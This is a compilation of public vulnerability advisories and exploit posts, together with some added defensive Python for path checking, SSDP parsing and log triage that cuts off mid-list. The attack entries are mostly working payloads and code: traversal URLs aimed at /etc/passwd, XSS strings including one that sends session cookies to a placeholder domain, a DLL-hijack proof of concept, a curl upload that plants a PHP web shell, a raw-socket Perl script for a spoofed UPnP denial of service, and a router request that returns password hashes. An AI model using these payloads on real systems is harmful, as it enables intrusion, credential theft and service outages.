<td class="windowbg">"><[PERSISTENT SCRIPT CODE]' <="" <strong="">
akyhne</strong>/...</td>


URL: http://www.example.com/smf/index.php?action=admin;area=smileys;sa=modifyset;set=2


Review: Newsletter > Add

<input name="email_force" value="0" type="hidden">
<input name="total_emails" value="1" type="hidden">
<input name="max_id_member" value="13" type="hidden">
<input name="groups" value="0,1,2,3" type="hidden">
<input name="exclude_groups" value="0,1,2,3" type="hidden">
<input name="members" value="" type="hidden">
<input name="exclude_members" value="" type="hidden">
<input name="emails" value="" type="hidden"><[PERSISTENT SCRIPT CODE])' <"="">
    </form>
  </div>
  <br class="clear" />
</div>

URL: http://www.example.com/smf/index.php?action=admin;area=news;sa=mailingmembers;b74f235ec=2b30f2b9aad6e26815e1c18594922b37


Review: Edit Membergroups & User/Groups Listing

<h3 class="catbg">Edit Membergroup - "><[PERSISTENT SCRIPT CODE])' <"=""><[PERSISTENT SCRIPT CODE]) <"
><ifram
</h3>
</div>
<div class="windowbg2">
<span class="topslice"><span></span></span>

URL: http://www.example.com/smf/index.php?action=admin;area=membergroups;sa=index;b74f235ec=2b30f2b9aad6e26815e1c18594922b37
URL: http://www.example.com/smf/index.php?action=admin;area=membergroups;sa=add;b74f235ec=2b30f2b9aad6e26815e1c18594922b37
            
source: https://www.securityfocus.com/bid/54467/info

Rama Zeiten CMS is prone to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to view local files in the context of the web server process, which may aid in further attacks.

Rama Zeiten CMS 0.99 is vulnerable; other versions may also be affected.

http://www.example.com/ramazeiten/download.php?file=../../../../../etc/passwd 
            
source: https://www.securityfocus.com/bid/54466/info

web@all is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

web@all 2.0 is vulnerable; other versions may also be affected. 

http://www.example.com/webatall-2.0/my/kindeditor/?name=%3Cscript%3Ealert%28123%29%3C/script%3E 
            
source: https://www.securityfocus.com/bid/54470/info

EmbryoCore CMS is prone to multiple directory-traversal vulnerabilities because it fails to properly sanitize user-supplied input.

Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application.

Exploiting these issues may allow an attacker to obtain sensitive information that could aid in further attacks.

EmbryoCore 1.03 is vulnerable; other versions may also be affected. 

http://www.example.com/embryocore1.03/libs/common/loadscript.php?j=./configuration.php%00

http://www.example.com/embryocore1.03/libs/common/loadscript.php?j=../../../../../../etc/passwd%00

http://www.example.com/embryocore1.03/libs/common/loadcss.php?c=../../../../../../etc/passwd%00

http://www.example.com/embryocore1.03/libs/common/loadcss.php?c=./configuration.php%00 
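Added example, not from Rama Zeiten CMS or EmbryoCore: a Python resolver of the kind download.php?file=, loadscript.php?j= and loadcss.php?c= need, with an assumed base directory. It rejects NUL bytes first (the %00 in the EmbryoCore URLs is what makes PHP's file functions drop the extension the script appends), then resolves the path and refuses anything that lands outside the base directory.

```python
import os


def resolve_under(base_dir, user_path):
    """Return the absolute path for user_path inside base_dir, or raise
    ValueError when it carries a NUL byte or would leave base_dir."""
    if "\x00" in user_path:
        # PHP's fopen()/include stop at the NUL, which truncates any extension
        # the caller appends; reject before doing anything else with the value
        raise ValueError("NUL byte in path")
    base = os.path.realpath(base_dir)
    # join() discards base when user_path is absolute; realpath() then folds
    # '..' segments and symlinks, so the containment check below sees the
    # final location rather than the requested string
    target = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes %s" % base)
    return target


def is_allowed(base_dir, user_path):
    try:
        resolve_under(base_dir, user_path)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    BASE = "/srv/embryocore/libs/common/js"   # assumed script directory
    for p in ["menu.js", "sub/../menu.js", "../../../../../../etc/passwd",
              "./configuration.php\x00", "/etc/passwd"]:
        print("%-32r -> %s" % (p, "allowed" if is_allowed(BASE, p) else "rejected"))
```

A loader that adds its own extension should validate the full name it is going to open (`resolve_under(BASE, name + ".js")`), not the bare parameter, and the check must run on the resolved path: a plain prefix test on the requested string is what `../` sequences defeat.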
            
source: https://www.securityfocus.com/bid/54591/info

AVA VoIP is prone to multiple security vulnerabilities because the application fails to sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, upload and execute arbitrary files in the context of the web server, and launch other attacks.

AVA VoIP 1.5.12 is vulnerable; other versions may also be affected. 

http://www.example.com/agent_accounts_report.php?agent_id=%22%3E%3Ciframe%20src=http://www.example1.com%20onload=alert%28%22VL%22%29%20%3C
http://www.example.com/tariff_add.php?tariff_id=%22%3E%3Ciframe%20src=http://www.example1.com%20onload=alert%28%22VL%22%29%20%3C
http://www.example.com/routeset_set.php?routeset_id=%22%3E%3Ciframe%20src=http://www.example1.com%20onload=alert%28%22VL%22%29%20%3C 
            
/*
source: https://www.securityfocus.com/bid/54477/info

Google Chrome is prone to a vulnerability that lets attackers execute arbitrary code.

An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Linked Library (DLL) file.

Google Chrome 19.0.1084.21 through versions 20.0.1132.23 are vulnerable.

Note: This issue was previously discussed in BID 54203 (Google Chrome Prior to 20.0.1132.43 Multiple Security Vulnerabilities), but has been given its own record to better document it. 
*/

#include <windows.h>

/* Payload: launch calc.exe to prove the planted DLL was loaded from the share */
int hijack_poc(void)
{
    WinExec("calc.exe", SW_NORMAL);
    return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved)
{
    (void)hinstDLL;
    (void)lpvReserved;
    /* Run once, when the process first maps the DLL, not on every thread attach */
    if (dwReason == DLL_PROCESS_ATTACH) {
        hijack_poc();
    }
    return TRUE;  /* report success so the host keeps the DLL loaded */
}
            
+---------------------------------------------------------------------------+ 
#[+] Author: TUNISIAN CYBER 
#[+] Title: WP Plugin Free ACF Frontend Display File Upload Vulnerability 
#[+] Date: 3-07-2015 
#[+] Type: WebAPP 
#[+] Download Plugin: https://downloads.wordpress.org/plugin/acf-frontend-display.2.0.5.zip
#[+] Tested on: KaliLinux 
#[+] Friendly Sites: sec4ever.com 
#[+] Twitter: @TCYB3R 
+---------------------------------------------------------------------------+ 

curl -k -X POST -F "action=upload" -F "files=@/root/Desktop/evil.php" "site:wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php" 

File Path: site/wp-content/uploads/uigen_YEAR/file.php 
Example: site/wp-content/uploads/uigen_2015/evil.php 
evil.php: <?php passthru($_GET['cmd']); ?> 


TUNISIAN CYBER(miutex)-S4E 		 	   		  
            
source: https://www.securityfocus.com/bid/54593/info

Barracuda SSL VPN 680 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Barracuda SSL VPN 680 versions prior to 2.2.2.203 are vulnerable. 

www.example.com/launchAgent.do?launchId=l3ce418&returnTo=[NON-PERSISTENT SCRIPT CODE!] 
            
source: https://www.securityfocus.com/bid/54593/info
 
Barracuda SSL VPN 680 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
 
Barracuda SSL VPN 680 versions prior to 2.2.2.203 are vulnerable. 

www.example.com/fileSystem.do?launchId=l52ca6d&actionTarget=list&path=smb/Sales%20Folder/Testing %20from%20Tri%20Opt/%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C 
            
source: https://www.securityfocus.com/bid/54599/info

Arora Browser is prone to a remote denial-of-service vulnerability.

Attackers can exploit these issues to crash an application, which causes a denial-of-service condition. 

<html>
<head>
<title>Arora Browser Remote Denial of Service</title>
<script type="text/javascript">
function loxians() {
    // 8000 "A"s, then appended 8000 more times: a window title of about 64 MB
    var buffer = "";
    for (var i = 0; i < 8000; i++) {
        buffer += "A";
    }
    var buffer2 = buffer;
    for (i = 0; i < 8000; i++) {
        buffer2 += buffer;
    }
    document.title = buffer2;
}
</script>
</head>
<body bgcolor="Grey">
<center>
<br><h2><a href="javascript:loxians();">YOU HAVE WON 100,000$ ! CLICK HERE!!</a></h2>
</center>
</body>
</html>
            
#!/usr/bin/perl
#
#  miniupnpd/1.0 remote denial of service exploit
#
#  Copyright 2015 (c) Todor Donev 
#  todor.donev@gmail.com
#  http://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#
#  The SSDP protocol can discover Plug & Play devices, 
#  with uPnP (Universal Plug and Play). SSDP is HTTP 
#  like protocol and work with NOTIFY and M-SEARCH 
#  methods.  
#
#  See also: 
#  CVE-2013-0229 
#  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0229  
#  CVE-2013-0230
#  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0230
#  
#  Tested on
#  Device Name :            IMW-C920W
#  Device Manufacturer :    INFOMARK (http://infomark.co.kr)
#  
#  These devices are commonly used by Max Telecom, Bulgaria
#
#  Disclaimer:
#  This or previous program is for Educational
#  purpose ONLY. Do not use it without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor Donev is not liable for any
#  damages caused by direct or indirect use of the
#  information or functionality provided by these
#  programs. The author or any Internet provider
#  bears NO responsibility for content or misuse
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact
#  that any damage (dataloss, system crash,
#  system compromise, etc.) caused by the use
#  of these programs is not Todor Donev's
#  responsibility.
#   
#  Use at your own risk!
#
#  See also:
#  SSDP Reflection DDoS Attacks 
#  http://tinyurl.com/mqwj6xt
#
#######################################
#
# # perl miniupnpd.pl
# 
# [  miniupnpd/1.0 remote denial of service exploit ]
# [ =============================================== ]
# [  Usage:					    
# [ ./miniupnpd.pl <victim address> <spoofed address>
# [  Example:
# [ perl miniupnpd.pl 192.168.1.1 133.73.13.37
# [  Example:
# [ perl miniupnpd.pl 192.168.1.1
# [ =============================================== ]
# [ 2015  <todor.donev@gmail.com> Todor Donev  2015 ]
#
# # nmap -sU 192.168.1.1 -p1900 --script=upnp-info
#
# Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST
# Nmap scan report for 192.168.1.1
# Host is up (0.00078s latency).
# PORT     STATE SERVICE
# 1900/udp open  upnp
# | upnp-info:
# | 192.168.1.1
# |     Server: 1.0 UPnP/1.0 miniupnpd/1.0
# |     Location: http://192.168.1.1:5000/rootDesc.xml
# |       Webserver: 1.0 UPnP/1.0 miniupnpd/1.0
# |       Name: INFOMARK Router
# |       Manufacturer: INFOMARK
# |       Model Descr: INFOMARK Router
# |       Model Name: INFOMARK Router
# |       Model Version: 1
# |       Name: WANDevice
# |       Manufacturer: MiniUPnP
# |       Model Descr: WAN Device
# |       Model Name: WAN Device
# |       Model Version: 20070228
# |       Name: WANConnectionDevice
# |       Manufacturer: MiniUPnP
# |       Model Descr: MiniUPnP daemon
# |       Model Name: MiniUPnPd
# |_      Model Version: 20070228
# MAC Address: 00:00:00:00:00:00 (Infomark Co.)           // CENSORED
#  
# Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
#
# # perl miniupnpd.pl 192.168.1.1
#
# [  miniupnpd/1.0 remote denial of service exploit ]
# [ =============================================== ]
# [ Target: 192.168.1.1
# [ Send malformed SSDP packet..
#
# # nmap -sU 192.168.1.1 -p1900
#  
# Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST
# Nmap scan report for 192.168.1.1
# Host is up (0.00085s latency).
# PORT     STATE  SERVICE
# 1900/udp closed upnp                                    // GOOD NIGHT, SWEET PRINCE.... :D
# MAC Address: 00:00:00:00:00:00 (Infomark Co.)           // CENSORED
#  
# Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds
#
#
# Special thanks to HD Moore ..
#

use strict;
use warnings;
use Socket qw(PF_INET SOCK_RAW IPPROTO_RAW IPPROTO_IP IP_HDRINCL inet_aton sockaddr_in);

if ( $< != 0 ) {
   print "Sorry, must be run as root!\n";
   print "This script uses a RAW socket.\n";
   exit;
}

my $ip_dst = defined $ARGV[0] ? (gethostbyname($ARGV[0]))[4] : undef;
my $ip_src = defined $ARGV[1] ? (gethostbyname($ARGV[1]))[4] : undef;

print "\n[  miniupnpd/1.0 remote denial of service exploit ]\n";
print "[ =============================================== ]\n";
select(undef, undef, undef, 0.40);

if (!defined $ip_dst) {
    print "[  Usage:\n[ ./$0 <victim address> <spoofed address>\n";
    select(undef, undef, undef, 0.55);
    print "[  Example:\n[ perl $0 192.168.1.1 133.73.13.37\n";
    print "[  Example:\n[ perl $0 192.168.1.1\n";
    print "[ =============================================== ]\n";
    print "[ 2015  <todor.donev\@gmail.com> Todor Donev  2015 ]\n\n";
    exit;
}

# IP_HDRINCL makes the kernel send the IP header we build instead of
# prepending its own (IPPROTO_RAW already implies it on Linux).
socket(RAW, PF_INET, SOCK_RAW, IPPROTO_RAW) or die "socket: $!";
setsockopt(RAW, IPPROTO_IP, IP_HDRINCL, 1) or die "setsockopt: $!";
main();

# Main program
sub main {
    my $payload = payload();
    my $packet  = iphdr(length $payload) . udphdr(length $payload) . $payload;
    # b000000m...
    send_packet($packet);
}

# IP header (Layer 3)
sub iphdr {
    my ($payload_len)  = @_;
    my $ip_ver         = 4;                      # IP Version 4             (4 bits)
    my $iphdr_len      = 5;                      # IP Header Length (words) (4 bits)
    my $ip_tos         = 0;                      # Differentiated Services  (8 bits)
    my $ip_total_len   = 20 + 8 + $payload_len;  # IP + UDP header + data   (16 bits)
    my $ip_frag_id     = 0;                      # Identification Field     (16 bits)
    my $ip_frag_flag   = '000';                  # IP Frag Flags (R DF MF)  (3 bits)
    my $ip_frag_offset = '0000000000000';        # IP Fragment Offset       (13 bits)
    my $ip_ttl         = 255;                    # IP TTL                   (8 bits)
    my $ip_proto       = 17;                     # IP Protocol (UDP)        (8 bits)
    my $ip_checksum    = 0;                      # 0: kernel fills it in    (16 bits)
    # No spoofed address on the command line: pick a random source
    $ip_src = inet_aton(randip()) if !defined $ip_src;   # IP Source (32 bits)
    # IP Packet construction (TTL and protocol packed as unsigned bytes)
    my $iphdr = pack(
        'H2 H2 n n B16 C C n a4 a4',
        $ip_ver . $iphdr_len, $ip_tos, $ip_total_len,
        $ip_frag_id, $ip_frag_flag . $ip_frag_offset,
        $ip_ttl, $ip_proto, $ip_checksum,
        $ip_src, $ip_dst
    );
    return $iphdr;
}

# UDP header (Layer 4)
sub udphdr {
    my ($payload_len) = @_;
    my $udp_src_port = 31337;             # UDP Source Port (16 bits)
    my $udp_dst_port = 1900;              # UDP Dest Port   (16 bits) SSDP
    my $udp_len      = 8 + $payload_len;  # UDP Length      (16 bits) header + data
    my $udp_checksum = 0;                 # UDP Checksum    (16 bits) 0 = none, valid over IPv4
    return pack('n n n n', $udp_src_port, $udp_dst_port, $udp_len, $udp_checksum);
}

# Create SSDP Bomb: a request line ending in a literal "\r\n" (backslash
# characters, not CRLF) followed by 1261 random upper-case letters
sub payload {
    my $data = "M-SEARCH * HTTP/1.1\\r\\n";
    $data .= chr( int(rand(25) + 65) ) for 0..1260;
    return $data;
}

# Generate random source ip address (dotted quad)
sub randip {
    return join('.', map { int(rand(255)) } 1..4);
}

# Send the malformed packet
sub send_packet {
    my ($packet) = @_;
    print "[ Target: $ARGV[0]\n";
    select(undef, undef, undef, 0.30);
    print "[ Send malformed SSDP packet..\n\n";
    send(RAW, $packet, 0, sockaddr_in(1900, $ip_dst)) or die "send: $!";
}
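As an added illustration for the miniupnpd entry above (not part of the script or of any vendor code), a strict SSDP request parser of the kind a daemon's receive path should run before it touches a datagram: it refuses the oversized, unterminated request the script emits and checks the mandatory M-SEARCH headers. The size limit and the required-header rules are assumptions drawn from the UPnP 1.0 discovery format.

```python
import re
from typing import Dict, Tuple

MAX_DATAGRAM = 1024   # assumption: a discovery request never needs more than this
REQUEST_LINE = re.compile(r"^(M-SEARCH|NOTIFY) \* HTTP/1\.[01]$")
HEADER_LINE = re.compile(r"^([!#$%&'*+\-.^_`|~0-9A-Za-z]+):[ \t]*(.*?)[ \t]*$")


class SsdpError(ValueError):
    """Raised for any datagram that does not follow the SSDP (HTTPU) grammar."""


def parse_ssdp(datagram: bytes) -> Tuple[str, Dict[str, str]]:
    """Return (method, headers) for a well-formed request, else raise SsdpError."""
    if len(datagram) > MAX_DATAGRAM:
        raise SsdpError(f"datagram too large ({len(datagram)} bytes)")
    head, sep, _body = datagram.partition(b"\r\n\r\n")
    if not sep:
        raise SsdpError("missing CRLFCRLF header terminator")
    try:
        text = head.decode("ascii")
    except UnicodeDecodeError as exc:
        raise SsdpError("non-ASCII byte in header block") from exc
    lines = text.split("\r\n")
    match = REQUEST_LINE.match(lines[0])
    if not match:
        raise SsdpError(f"bad request line: {lines[0][:40]!r}")
    method = match.group(1)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        hm = HEADER_LINE.match(line)
        if not hm:
            raise SsdpError(f"bad header line: {line[:40]!r}")
        name = hm.group(1).upper()
        if name in headers:
            raise SsdpError(f"duplicate header {name}")
        headers[name] = hm.group(2)
    if method == "M-SEARCH":
        # UPnP 1.0 discovery: HOST, MAN and ST are mandatory, MX is 1..5 seconds
        for required in ("HOST", "MAN", "ST"):
            if required not in headers:
                raise SsdpError(f"M-SEARCH without {required} header")
        if headers["MAN"] != '"ssdp:discover"':
            raise SsdpError('MAN must be "ssdp:discover"')
        mx = headers.get("MX", "1")
        if not mx.isdigit() or not 1 <= int(mx) <= 5:
            raise SsdpError(f"MX out of range: {mx!r}")
    return method, headers


def reject_reason(datagram: bytes) -> str:
    """Empty string when the datagram is well-formed, otherwise why it was refused."""
    try:
        parse_ssdp(datagram)
        return ""
    except SsdpError as exc:
        return str(exc)


# Constructed samples (not captured traffic): a valid discovery request, and a
# datagram shaped like the one the script above builds: the request line with a
# literal backslash-r-n instead of CRLF, then 1261 upper-case letters (a
# deterministic stand-in for its random tail).
GOOD_MSEARCH = (b"M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n"
                b'MAN: "ssdp:discover"\r\nMX: 2\r\nST: ssdp:all\r\n\r\n')
MALFORMED = b"M-SEARCH * HTTP/1.1\\r\\n" + bytes(65 + (i * 7) % 25 for i in range(1261))
NO_ST = b'M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nMAN: "ssdp:discover"\r\n\r\n'

if __name__ == "__main__":
    for label, dgram in (("good", GOOD_MSEARCH), ("malformed", MALFORMED), ("no ST", NO_ST)):
        print(f"{label:10s} -> {reject_reason(dgram) or 'accepted'}")
```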
            
# Exploit Title:  CSRF & XSS
# Google Dork: intitle: CSRF & XSS
# Date: 2015-07-05
# Exploit Author:  John Page ( hyp3rlinx )
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: bitbucket.org/phpliteadmin
# Software Link: bitbucket.org/phpliteadmin
# Version: v1.1
# Tested on: windows 7
# Category: webapps

Vendor:
================================
bitbucket.org/phpliteadmin

Product:
================================
phpLiteAdmin v1.1

Advisory Information:
================================================
CSRF & XSS Vulnerabilities

Vulnerability Details:
======================

CSRF:
------
No CSRF token is checked when calling the various SQL operations, so a user
who clicks a crafted link can be made to drop database tables, provided the
table name is known.

XSS:
------
There are three XSS vulnerabilities I point out: the first is the use of
'PHP_SELF', the second is an unsanitized parameter for the SQL statement when
calling the drop-table method, e.g.
'http://localhost/phpliteadmin.php?droptable=[XSS]',
and the third is an unsanitized 'table' parameter, e.g.
'http://localhost/phpliteadmin_v1-1/phpliteadmin.php?table=[XSS]'

Let's look at the first one in more depth, as it's more fun.
phpliteadmin uses the PHP reserved server variable $_SERVER['PHP_SELF'], which
is vulnerable if not used correctly, allowing us to inject an XSS payload to
steal session cookies and navigate users to a place of our choosing in order
to cause mayhem.

On line 32 of 'phpliteadmin.php' we find vulnerable code:

--------------------------------------------------------
//build the basename of this file
$nameArr = explode("?", $_SERVER['PHP_SELF']);
$thisName = $nameArr[0];
$nameArr = explode("/", $thisName);
$thisName = $nameArr[sizeof($nameArr)-1];

//constants
define("VERSION", "1.1");
define("PAGE", $thisName);
-------------------------------------------------------

In PHP docs we find the following explanation of 'PHP_SELF':
"The filename of the currently executing script, relative to the document
root."
ref: http://php.net/manual/en/reserved.variables.server.php

It is known that $_SERVER['PHP_SELF'] can make your application insecure, as we
can inject code following a forward slash "/".
But we have a slight problem to overcome: we can execute code, but our forward
slashes will not be processed correctly and the exploit will FAIL, leaving us
with the following useless URL instead of taking the victim to a domain of our
choice.


Failed exploit example:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php/"'onMouseOver="window.open('http://hyp3rlinx.altervista.org')"

Failed result:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php/hyp3rlinx.altervista.org


But all is NOT lost! We will build the forward slashes of our malicious URL
inside the JS call to the window.open() method using
String.fromCharCode(58) for ':' and String.fromCharCode(47) for '/', which
NOW gives us what we seek: control over the user's browser, taking them to
some terrible dark place.

Bypass $_SERVER['PHP_SELF'] forward slash '//' processing issue:

Tada! Our successful XSS exploit:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php/"'onMouseOver="(function(){var x='http';x+=String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+'hyp3rlinx.altervista.org';window.open(x);})()"


Exploit code(s):
===============

XSS(s) POC:
----------


1- $_SERVER['PHP_SELF'] XSS exploit steals the current admin session cookie and
sends it to a remote server:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php/"'onMouseOver="(function(){var x='http';x+=String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+'MALICIOUS-DOMAIN';window.open(x+String.fromCharCode(47)+'cookietheft.php'+String.fromCharCode(63)+'='+document.cookie);})()"


2- SQL droptable XSS:
http://localhost/sectest/phpliteadmin_v1-1/phpliteadmin.php?droptable=<script>alert(666)</script>


3- SQL table XSS:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php?table="/><script>alert(666)</script>



CSRF POC:
---------
Drop tables:
localhost/phpliteadmin_v1-1/phpliteadmin.php?droptable=mytable&confirm=1



Disclosure Timeline:
=========================================================


Vendor Notification:  NA
July 5, 2015  : Public Disclosure



Severity Level:
=========================================================
Med



Description:
==========================================================


Request Method(s):              [+] GET


Vulnerable Product:             [+] phpliteadmin_v1-1


Vulnerable Parameter(s):        [+] $_SERVER['PHP_SELF'], droptable, table


Affected Area(s):               [+] Admin


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and prohibits any malicious use of all security related
information or exploits by the author or elsewhere.


(hyp3rlinx)
            
#[+] Author: SATHISH ARTHAR
#[+] Exploit Title: Dlink Wireless Router Password File Access Exploit (Local File Inclusion)
#[+] Date: 07-07-2015
#[+] Platform: Hardware
#[+] Tested on: linux
#[+] Vendor: http://www.dlink.co.in
#[+] Product web page: http://www.dlink.co.in

#[+] Affected version:
DSL-2750u (firmware: IN_1.08 )
DSL-2730u (firmware: IN_1.02 )

#[+] Sites: sathisharthars.wordpress.com
#[+] Twitter: @sathisharthars
#[+] Thanks: offensive security (@offsectraining)


#########################################################################
Dlink Wireless Router Password File Access Exploit
#########################################################################

Summary:

The Dlink DSL-2750u and DSL-2730u wireless routers improve
your legacy Wireless-G network. They are a simple, secure way to share your
Internet connection and allow you to easily surf the Internet, use email,
and have online chats. The quick, CD-less setup can be done through a web
browser. The small, efficient design fits perfectly into your home and
small office.


Desc:

The router suffers from an authenticated local file inclusion (LFI)
vulnerability: input passed through the 'getpage' parameter of the 'webproc'
CGI script is not properly verified before being used to include files. This
can be exploited to include files from local resources.


Tested on: mini_httpd/1.19 19dec2003



===============================================================


GET /cgi-bin/webproc?var:page=wizard&var:menu=setup&getpage=/etc/passwd HTTP/1.1
Host: 192.168.31.10
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sessionid=2b48aa9b
Connection: keep-alive


HTTP/1.0 200 OK
Content-type: text/html
Pragma: no-cache
Cache-Control: no-cache
set-cookie: sessionid=2b48aa9b; expires=Fri, 31-Dec-9999 23:59:59 GMT;path=/

#root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh


GET /cgi-bin/webproc?var:page=wizard&var:menu=setup&getpage=/etc/shadow HTTP/1.1
Host: 192.168.31.10
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sessionid=2b48aa9b
Connection: keep-alive


HTTP/1.0 200 OK
Content-type: text/html
Pragma: no-cache
Cache-Control: no-cache
set-cookie: sessionid=2b48aa9b; expires=Fri, 31-Dec-9999 23:59:59 GMT;path=/

#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
            
source: https://www.securityfocus.com/bid/54611/info

The 'com_hello' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. 

http://www.example.com/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00 
            
source: https://www.securityfocus.com/bid/54613/info

Maian Survey is prone to a URI-redirection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker can exploit these vulnerabilities to execute arbitrary local files within the context of the webserver process or redirect users to a potentially malicious site. This may aid in phishing attacks or allow the attacker to compromise the application; other attacks are also possible.

Maian Survey 1.1 is vulnerable; other versions may also be affected. 

http://www.example.com/[PATH]/admin/index.php?cmd=LFI_here
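Taken together, the AVA VoIP, phpLiteAdmin, D-Link, com_hello and Maian Survey entries above show two recurring request shapes: script markup reflected from a query string or from PHP_SELF path info, and file paths or traversal sequences in an include parameter. As an added example that is not part of any of these advisories, this log triage pass pulls those shapes out of web-server access logs; the Common Log Format parsing, the marker lists and the sample lines are constructed assumptions.

```python
import re
from typing import List, NamedTuple
from urllib.parse import parse_qsl, unquote, urlsplit

# Common Log Format: client ident user [time] "METHOD target HTTP/x" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

# Substrings taken from the PoC URLs above; compared case-insensitively
XSS_MARKERS = ("<script", "<iframe", "onload=", "onmouseover=", "javascript:", "fromcharcode(")
# Traversal, the classic include targets, and the null byte used to cut off a suffix
LFI_MARKERS = ("../", "..\\", "/etc/passwd", "/etc/shadow", "\x00")


class Finding(NamedTuple):
    client: str
    kind: str        # "xss", "lfi" or "path_info_injection"
    parameter: str   # query parameter name, or "<path>" for PATH_INFO
    evidence: str


def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable so a double-encoded %253C ('<') is caught too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(target: str, client: str) -> List[Finding]:
    """Inspect one request target (path + query) and report what it looks like."""
    findings: List[Finding] = []
    parts = urlsplit(target)
    path = decode_fully(parts.path)
    # Anything after the script name is PATH_INFO: attacker-controlled, yet it
    # lands in $_SERVER['PHP_SELF'], which phpLiteAdmin echoes unescaped.
    tail = re.search(r"\.php(/.*)$", path, re.IGNORECASE)
    if tail and any(ch in tail.group(1) for ch in "\"'<>"):
        findings.append(Finding(client, "path_info_injection", "<path>", tail.group(1)[:60]))
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = decode_fully(raw)          # parse_qsl decoded once already
        if any(marker in value.lower() for marker in XSS_MARKERS):
            findings.append(Finding(client, "xss", name, value[:60]))
        if any(marker in value for marker in LFI_MARKERS):
            findings.append(Finding(client, "lfi", name, value[:60]))
    return findings


def triage(log_lines: List[str]) -> List[Finding]:
    """Run classify() over CLF lines; lines that do not parse are skipped, not fatal."""
    findings: List[Finding] = []
    for line in log_lines:
        m = CLF.match(line)
        if m:
            client, _method, target, _status = m.groups()
            findings.extend(classify(target, client))
    return findings


# Constructed log lines (RFC 5737 addresses) using the request shapes above.
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Jul/2015:10:00:01 +0000] "GET /agent_accounts_report.php'
    '?agent_id=%22%3E%3Ciframe%20src=http://www.example1.com%20onload=alert%28%22VL%22%29%20%3C HTTP/1.1" 200 512',
    '203.0.113.5 - - [05/Jul/2015:10:00:02 +0000] "GET /phpliteadmin.php/%22%27onMouseOver=%22alert(1)%22 HTTP/1.1" 200 4096',
    '198.51.100.7 - - [05/Jul/2015:10:00:03 +0000] "GET /index.php?option=com_hello&controller=../../../../etc/passwd%00 HTTP/1.1" 200 1024',
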